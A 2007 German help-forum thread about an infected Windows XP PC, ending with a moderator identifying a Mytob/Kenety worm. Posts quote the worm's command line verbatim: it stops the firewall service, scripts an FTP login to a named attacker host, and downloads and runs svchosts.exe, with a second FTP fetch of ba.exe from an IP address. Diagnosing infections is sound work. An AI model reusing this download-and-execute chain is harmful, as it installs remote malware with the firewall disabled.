ingointernet
Goto Top

Automatischer start einer FTP Verbindung um ba.exe herunter zu laden

Virus Trojaner????

Hallo zusammen,

seit kurzem habe ich auf einem Rechner seltsame Probleme. Der Rechner ist mit Windows XP SP2 ausgestattet und die aktuellsten SP's und Patches sind drauf. Auf dem Rechner läuft Antivr als Virenscanner.

Nun startet sich immer wieder im Hintergrund eine Datei und ruft mir folgenden Befehl auf:

"c:\windows\system32\cmd32.exe -ftp -n -v -s:iJ"

Command-Fenster ist offen und der angezeigte Text lautet:

C:\Windows\system32>cmd /c net stop SharedAccess &echo open elterryer.serveftp.com 21 >> iJ &echo user roko syfredi >> iJ & echo binary >> ij &echo get svchosts.exe >> ij &echo by >> ij &ftp -n -v -s:ij &del ij &svchosts.exe &net start SharedAccess &exit

Danach kommt die Meldung dass die Gemeinsame Nutzung der Internetverbindung erfolgreich beendet wurde. allerdings ist dann ftp geöffnet mit folgenden Werten:

ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe

Ich kann ja noch ungefähr nachvollziehen was er da alles macht, aber kann die verdammte Datei die den schrott ausführt nicht lokalisieren.

Falls Ihr eine Idee habt, wäre ich euch sehr dankbar.

Grüße

Martin

P.S. Stinger, Adaware, Antivir mehrfach darüberlaufen gelassen, da dies aber normale Befehle sind haben die tools nichts gefunden.
Registry und system.ini sowie win.ini überprüft.

Content-ID: 55135

Url: https://administrator.de/contentid/55135

Ausgedruckt am: 23.11.2024 um 02:11 Uhr

cykes
cykes 27.03.2007 um 09:02:18 Uhr
Goto Top
Hi,

ich würde mal auf einen Wurm/Trojaner tippen. Den Rechner solltest Du mal offline scannen, am besten mit einer auf einem sauberen PC erstellte BartPE BNoot CD und ein paar Antivirentools drauf.

Gruß

cykes
Locke72
Locke72 27.03.2007 um 09:32:26 Uhr
Goto Top
Wenn ich das noch richtig in Erinnerung habe, ist die ba.exe ein Tool, welches nach BIOS-Updates bei Mr. BIOS schaut. Siehe auch http://www.nickles.de/biosguide/html/11.php3 Hast du mal versucht, dein BIOS upzudaten ohne die Originalherstellerseite zu nutzen?

Die aufgerufene IP-Adresse jedenfalls gehört nach meinen Recherchen zu Mr. Bios ...
cykes
cykes 27.03.2007 um 10:23:50 Uhr
Goto Top
Aber dieser Teil ist definitiv nicht normal:

"c:\windows\system32\cmd32.exe -ftp -n
-v -s:iJ"

Command-Fenster ist offen und der angezeigte
Text lautet:

C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit
IngoInternet
IngoInternet 27.03.2007 um 14:46:54 Uhr
Goto Top
habe ich mir auch schon überlegt, werde die Festplatte ausbauen.
Komisch ist nur, dass es standard Befehle sind und ich mir überlegt habe, ob ein Virenscanner diese überhaubt als Virus erkennt.

Gruß

Martin
IngoInternet
IngoInternet 27.03.2007 um 14:50:36 Uhr
Goto Top
Hab ich auch gelesen, vor diesem ba.exe stand aber immer noch etwas davor (cdac11ba.exe)
Und ich wüßte nicht, wann ich irgendwie ein tool zum Bios update installiert hätte.

Gruß

Martin
IngoInternet
IngoInternet 27.03.2007 um 14:54:05 Uhr
Goto Top
Ja, verdammt komisch. Aber Dein Tipp mit dem extern scannen werde ich machen, da er wohl zuerst die svchosts datei von einem FTP server herunter lädt und die könnte natürlich infiziert sein.

Gruß

Martin
cykes
cykes 27.03.2007 um 15:34:55 Uhr
Goto Top
Hi,

habe gerade mal ausprobiert, was es mit dem FTP Server auf sich hat, der ist nicht mehr
existent. Der Hostname gehört zu einem Rechner, der per no-ip.com einen dynamischen DNS
Eintrag bekommt. Das Script dürfte also keine Dateien heruntergeladen haben.
Der Rechner ist über den Provider rima-tde.net - über den ich bisher noch nichts weiteres finden
konnte eingewählt.
Aber sicherheitshalber mach den Offlinescan trotzdem.

Gruß

cykes
IngoInternet
IngoInternet 27.03.2007 um 17:33:07 Uhr
Goto Top
Habe den Offlinescan gemacht aber wie ich vermutet habe ist der scan ohne Meldung durchgelaufen.
IngoInternet
IngoInternet 27.03.2007 um 18:00:31 Uhr
Goto Top
Übrigens habe auch gerade nochmals getestet und der FTP server unter 83.239.179.74 mit der Portnummer 64928 läuft immernoch.
konnte mich sogar anmelden. geht nur nicht ganz durch.
cykes
cykes 27.03.2007 um 18:34:11 Uhr
Goto Top
Mit welchem Scanner hast Du denn Rechner denn überprüft?
IngoInternet
IngoInternet 28.03.2007 um 08:52:00 Uhr
Goto Top
Hallo,

habe die Festplatte ausgebaut und Sophos sowie Antivir nochmals darüber gejagt, keiner hat was gefunden.
gnarff
gnarff 01.09.2007 um 22:51:36 Uhr
Goto Top

Nun startet sich immer wieder im Hintergrund
eine Datei und ruft mir folgenden Befehl
auf:

"c:\windows\system32\cmd32.exe -ftp -n
-v -s:iJ"

Command-Fenster ist offen und der angezeigte
Text lautet:

C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit

Danach kommt die Meldung dass die Gemeinsame
Nutzung der Internetverbindung erfolgreich
beendet wurde. allerdings ist dann ftp
geöffnet mit folgenden Werten:

ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe

Was wir hier sehen ist der Downloadrequest fuer einen Trojaner, ein schoenes Beispiel hierzu, kann man auf folgender Seite bewundern.
In vorliegenden Fall wurde fruchtlos versucht, die Datei ba.exe herunterzuladen.
Bei der ba. exe handelt es sich um einen Wurm aus der W32/Mytob-Reihe.
Seltsamerweise ist in der Shellaktivitaet ein Verweis auf den Server elterryer.serveftp.com, was eigentlich auf einen anderen Wurm hinweist, den W32.Kenety, siehe weitere Informationen

Das wollte ich nur noch dazu loswerden, bevor ich den Thread auf geloest setze.
saludos
gnarff /el moderador